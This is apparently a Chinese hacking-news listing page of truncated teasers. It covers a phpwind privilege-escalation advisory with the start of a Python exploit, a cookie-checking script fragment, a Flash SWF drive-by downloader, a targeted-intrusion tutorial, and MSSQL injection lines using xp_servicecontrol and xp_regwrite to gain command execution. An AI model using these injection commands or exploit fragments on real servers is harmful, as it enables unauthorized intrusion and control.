Python代码 各位大大自己分析写其他版吧
常来http://www.80sec.com

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_op

[阅读全文]

漏洞发布：http://www.80sec.com/

漏洞作者：jianxin@80sec.com

漏洞厂商： http://www.phpwind.com/  本漏洞影响phpwind所有版本

漏洞危害：高

漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作

利用方式：http://www.80sec.co

[阅读全文]

<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
exp

[阅读全文]

[阅读全文]

[阅读全文]

新闻来源:cbmland.com
今天取到了一份swf格式的exploits，测试了一下在Flash Player 9 .0.115的结果。
Adobe Flash Player 9 .0.115 在播放恶意构造的swf时，会自动下载一个可执行文件并执行，而我拿到的这个swf文件会自动下载一个downloader并运行，然后再由这个downloader下载其他预先指定的木马程序，相当的危险。

这个漏

[阅读全文]

文章来源:网络
很多网上安全教程都介绍了如何通过百度和GOOGLE来搜索漏洞代码而发动攻击，这种文章在实际应用中没有什么价值，
毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。
只有学会针对某定点服务器进行扫描和攻击才有利于我们增长企业安全防范与攻击技术，
今天笔者就从实际出发带领各位IT168读者学习针对某固定服务器的扫描入侵一条龙操作，让读者对攻击与防御有一个零距离的

[阅读全文]

试在NB里面恢复CMDSHELL、OACREAT都没有成功，所以开启SQLSERVERAGENT

;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';--

　　还是没有成功，无奈之中希望寄托于沙盒模式，执行如下语句开启沙盒模式

;execmaster..xp_regwrite 'HKEY_L

[阅读全文]

[阅读全文]

在微软的系统中，文件夹也是一种文件，只不过其属性特殊一点罢了。既然这样，按照微软的规定，在同一文件夹下不允许同名的文件或文件夹出现。所以，我们可以利用这个规定来自己建立一个名为Autorun.inf的文件夹来防范Autorun.inf病毒。

　　这种方法曾经有人提出来过，也有一定的效果。但是，可谓是“道高一尺，魔高一丈”。病毒也不是吃素的，在运行之前先检测有没有Autorun

[阅读全文]